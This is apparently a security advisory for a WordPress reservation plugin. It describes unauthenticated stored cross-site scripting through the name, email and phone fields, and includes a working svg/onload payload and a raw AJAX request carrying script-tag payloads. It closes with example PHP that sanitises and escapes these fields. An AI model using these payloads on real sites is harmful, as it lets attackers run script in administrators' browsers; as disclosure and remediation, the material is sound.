The plugin does not sanitise and escape some of the reservation user inputs, allowing unauthenticated attackers to perform Stored Cross-Site Scripting attacks against a logged-in admin viewing the malicious reservation
As an unauthenticated user, make a reservation (i.e. on a page where the [reservation_form] shortcode is embedded) and put the following payload in the Full Name field: a a"><svg/onload=alert(/XSS/)>
The Phone Number and Email are also vulnerable (they are only validated client side):
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 428
Connection: close

action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20full%20name%5c%22)%3c%2fscript%3e%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20mail%5c%22)%3c%2fscript%3e%22%2c%222%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20phone%20number%5c%22)%3c%2fscript%3e%22%2c%22pending%22%5d
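The root cause above is that the Full Name, Email and Phone Number values are only checked in the browser and are later echoed into the admin reservation list unescaped. The following PHP is an added example of how such an AJAX handler should treat those fields server-side; it is not the plugin's own code. It uses WordPress core helpers (sanitize_text_field, sanitize_email, is_email, esc_html, check_ajax_referer, wp_send_json_error) and assumes the decoded `data` array has the full name at index 5, the email at index 6 and the phone number at index 8, matching the order visible in the request body; the function names, the nonce action and the use of `validation_key` as a nonce are assumptions.

```php
<?php
// Added example, not the plugin's code. Server-side validation on write
// plus escaping on read for the reservation fields shown in the advisory.

// Assumed index -> field mapping of the decoded `data` JSON array.
const RES_IDX_FULL_NAME = 5;
const RES_IDX_EMAIL     = 6;
const RES_IDX_PHONE     = 8;

/**
 * Normalise and validate the user-supplied reservation fields.
 * Returns a clean array or a WP_Error; never trusts client-side checks.
 */
function res_example_sanitize( array $data ) {
    // Strips tags, converts stray '<' and removes line breaks / extra whitespace.
    $full_name = sanitize_text_field( (string) ( $data[ RES_IDX_FULL_NAME ] ?? '' ) );

    // sanitize_email() drops disallowed characters; is_email() validates the shape.
    $email = sanitize_email( (string) ( $data[ RES_IDX_EMAIL ] ?? '' ) );

    // Allow-list for phone numbers: digits, plus, spaces, parentheses, dots, dashes.
    $phone = preg_replace( '/[^0-9+\s().\-]/', '', (string) ( $data[ RES_IDX_PHONE ] ?? '' ) );

    if ( '' === $full_name || mb_strlen( $full_name ) > 100 ) {
        return new WP_Error( 'invalid_name', 'Invalid full name.' );
    }
    if ( ! is_email( $email ) ) {
        return new WP_Error( 'invalid_email', 'Invalid email address.' );
    }
    if ( '' === $phone || strlen( $phone ) > 30 ) {
        return new WP_Error( 'invalid_phone', 'Invalid phone number.' );
    }

    return array(
        'full_name' => $full_name,
        'email'     => $email,
        'phone'     => $phone,
    );
}

/**
 * AJAX "create" handler. Hooked for both logged-in and anonymous visitors,
 * because the reservation form is public by design.
 */
function res_example_create_handler() {
    // Assumed: `validation_key` carries a nonce created with the action 'res_example_create'.
    check_ajax_referer( 'res_example_create', 'validation_key' );

    $raw  = wp_unslash( $_POST['data'] ?? '[]' );
    $data = json_decode( $raw, true );
    if ( ! is_array( $data ) ) {
        wp_send_json_error( 'Malformed reservation payload.', 400 );
    }

    $clean = res_example_sanitize( $data );
    if ( is_wp_error( $clean ) ) {
        wp_send_json_error( $clean->get_error_message(), 400 );
    }

    // ... persist $clean with $wpdb->insert() or update_post_meta() here ...
    wp_send_json_success( $clean );
}
add_action( 'wp_ajax_res_example_create', 'res_example_create_handler' );
add_action( 'wp_ajax_nopriv_res_example_create', 'res_example_create_handler' );

/**
 * Admin-side rendering. Escape at output time as well, so a record that
 * reached the database by any other path still cannot execute in wp-admin.
 */
function res_example_render_row( array $r ) {
    return sprintf(
        '<tr><td>%s</td><td>%s</td><td>%s</td></tr>',
        esc_html( $r['full_name'] ),
        esc_html( $r['email'] ),
        esc_html( $r['phone'] )
    );
}
```

With this in place the payloads from the request above are either rejected (the email field fails is_email(), the phone field loses every non-numeric character) or neutralised (the `<script>` and `<svg ...>` fragments in the full name are stripped on save), and the esc_html() calls in the admin table mean that even a raw value would render as literal text rather than markup. Treating the write path and the read path as two independent controls is the point; fixing only one of them leaves the other to be found later.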